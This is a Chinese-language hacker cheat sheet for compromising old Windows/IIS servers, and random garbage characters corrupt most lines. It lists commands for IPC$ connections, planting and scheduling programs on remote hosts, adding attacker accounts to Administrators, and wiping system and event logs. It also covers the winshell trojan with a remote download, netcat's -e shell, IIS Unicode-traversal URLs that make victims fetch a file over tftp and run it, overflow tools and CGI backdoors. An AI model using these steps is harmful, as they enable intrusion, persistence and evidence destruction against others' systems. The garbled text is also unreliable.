网管和黑客都必须知道的命令
Sx2j~(�pOr 常用的几条NET命令:
�DtZm|~)a� Q\7�6jD`m\ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
b�nG�A.��b ^U}0D^jDeE (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
!U�T�J) �& >$D�qG$D� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
P `�"�7m-� ZA�ZCv�N@5 (查看远程主机时间) net time \\IP地址
+$t%�L��� V1�.F`�3h~ (定时启动某个程序) at \\IP地址 02:18 readme.exe
)a\h5�nQI) +b�+sQ<w?. (查看共享) net view \\IP地址
�� D;]%��� C)�j)�j&�� (查看netbios工作组列表) nbtstat -A IP地址
�.K�N]a"]� �8GldVn�.u (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
>Il`AR��;D �,�X^_w�
g (这两条把自己增加到管理员组): net user 用户名 密码 /add
^v-'�=1ub? 9�19�g�5f` net localgroup Administrators 用户名 /add
QGd- 9UEA] =f�!M��=D� (断开连接) net use \\IP地址\ipc$ /delete
]�aNnY?qW5 <Z�'�h�Z�� 扫尾:
�`�T�j}4�f 3��;NRW�+� del C:\winnt\system32\logfiles\*.*
F]YKYF'�1I Q8y|:tb�$Y del C:\winnt\ssytem32\config\*.evt
Z<W6Avr� ozLJ�#eOE9 del C:\winnt\system32\dtclog\*.*
��"z���bE� �5��H+k_U� del C:\winnt\system32\*.log
lIg2iun[�n Tm52=+u�f$ del C:\winnt\system32\*.txt
��sE�6J:m( \a�Iy68rH, del C:\winnt\*.txt
A�vZ)��1�( �Wg^cj:&`u del C:\winnt\*.log
)/"�7$2Aoy p'~5[�J�R: 一、netsvc.exe
31�& .Lnq t�Y=%@v'6? 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�
c^��s��> ��,rQ�)�TT netsvc /list \\IP地址
�'qAfe�i'] �r%d�11�[z netsvc schedule \\IP地址 /query
!�T#y ��r) �p�^�P y,� netsvc \\IP地址 schedule /start
OPW"A�B�J �CDn�z
&�? 二、OpenTelnet.exe
/�T�[ICd2J |+-�i'N�9� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
RWCS
��u�$ �aa8Qs�lm� OpenTelnet \\IP地址 用户名 密码 1 7878
�bK\WdG�\; b6&NzUt34V 然后就可以telnet到主机的7878端口,进入DOS方式下:
���?�4e6w� #H�i]&�)p_ telnet IP地址 7878
@BUqQ9q:� Ai�j�T��T% 三、winshell.exe
�#G��` ��, aLt�{�X)�? 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�}X�j_�Y]T x�c.D!Iav� p Path (查看winshell主程序的路径信息)
9ox|.��68q '%��C�.(�[ b reBoot (重新启动机器)
siY��RR�r� Y>Hl�0$:= d shutDown (关闭机器)
GA.bRN2CI2 AUsQj\�Nm% s Shell (执行后你就会看到可爱的“C:\>”)
Fx5d�@WNa> 2�p�a3}6P+ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
P��lH`�(n# 3n(gfQ�o-o CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
ggc�?J<Dv� w/�5^����R 四、3389登陆器,GUI方式登录远程主机的
D"4&9"C��U #Jz&9I<OKx 五、elsave.exe
86fK=�G:�> +�'��KE T, 事件日志清除工具
C_cs�(}w�i c�vE.r330| elsave -s \\IP地址 -l "application" -C
qlIT�QKGG� 7'��i#!5�� elsave -s \\IP地址 -l "system" -C
B36�puz 0{ e ]�o�'i;I elsave -s \\IP地址 -l "security" -C
^y0C5�Bl;� �[C��j)@OC 执行后成功清除应用程序日志,系统日志,安全日志
�!{��ti�TA �)9L� ��pX 六、hbulot.exe
5�b1uD>,;y rjHIQC�� C 开启win2kserver和winxp的3389服务
uk[< 6�oxz n�IQ&gbfO� hbulot [/r]
kga�pTv>�q z<%g�
#b�o 使用/r表示安装完成后自动重起目标使设置生效。
w&yGYH��g� "�lz[zFnO� 七、nc.exe(netcat.exe)
�cPsn]�U� 5 �k%9>U%$ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
S=H_��9io �+�O��$:�� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
N1N{��O�l' 'K�`�Rbhy� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
)���HX:U0� (�e>R�o�t0 参数:
4 %�)N(�%u !@<�@�QG�- -e prog 程序重定向,一旦连接,就执行 [危险!!]
[Z5�[�~gP3 ��guOSO�@� -g gateway source-routing hop point[s], up to 8
�K��ka8cG� F�t;u�\�KT -G num source-routing pointer: 4, 8, 12, ...
�.bl��ft,' 3<Z'��F}lg -h 帮助信息
AwXt� @�!( kg:
uG��P9 -i secs 延时的间隔
�Fu4��E�Ei 5��rml�Aq -l 监听模式,用于入站连接
�Cb{A:\>Q{ n(1wdl��Ep -n 指定数字的IP地址,不能用hostname
g�6�V��D�_ %x}&=zx0*1 -o file 记录16进制的传输
Y62u%':��X wY3|#P
CDV -p port 本地端口号
y=9Dxst"�V p�2x1�xv�� -r 任意指定本地及远程端口
$xA J9_2P �(�7;J�"2M -s addr 本地源地址
q�11Q�Ax4p uK�bHF��F� -u UDP模式
b
H"}w$!>r j&dx[4|m:h -v 详细输出——用两个-v可得到更详细的内容
vS$oT]-hKE *
{gx�I<�� -w secs timeout的时间
dY�/�u<�4� p��,�w|=@= -z 将输入输出关掉——用于扫描时
��c.(Ud`jc 八、TFTPD32.EXE
J3~h�z�g�Y f2 ydL/M,� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
0L:V#y-*�� ��l�mhb�F� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�=! N _^cb <AMb!?Ob�h 然后可以直接令文件运行:
E7�g�H�i$ B�brT� f"` http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
Y9�i9Uc.�] }PI35�i1!t 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
LG=X)w)W4S \5'O.*pr� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
`RL,�ZoYuu �8
�"_�Bq 一、一 Xscan命令行运行参数说明:
V�$��dJmKg G@�!_ZM�8h 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�=[P%_�v`` ~V2ajM1Z&O 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�4=�T�pi` 5���S%C~iB xscan -file <主机列表文件名> <检测项目> [其他选项]
D�3S+�L�V� R:�w��%�2Y 其中<检测项目> 含义如下:
ImWXzg3@{� E�O#�gU��v -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
A�s@ihB+(\ b�/s�OfQ�� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
h�; 'W :P
F0&~ ?2n�G -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�)���L |tn vpm ]9>1�[ -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
vWU%�S�T�� \|2t�TvW,0 -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�xLx�"*jyL K2cq97k�,d [其他选项] 含义如下:
8jy-z"jc�� e0�f"�:Vct -v: 显示详细扫描进度
>ik1]!j]Lv ;/@?6���T" -p: 跳过Ping不通的主机
J3;Tm~KJ_� <RO�puY\!l -o: 跳过没有检测到开放端口的主机
Z-(} �l�2\ �#��P(l2�( -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
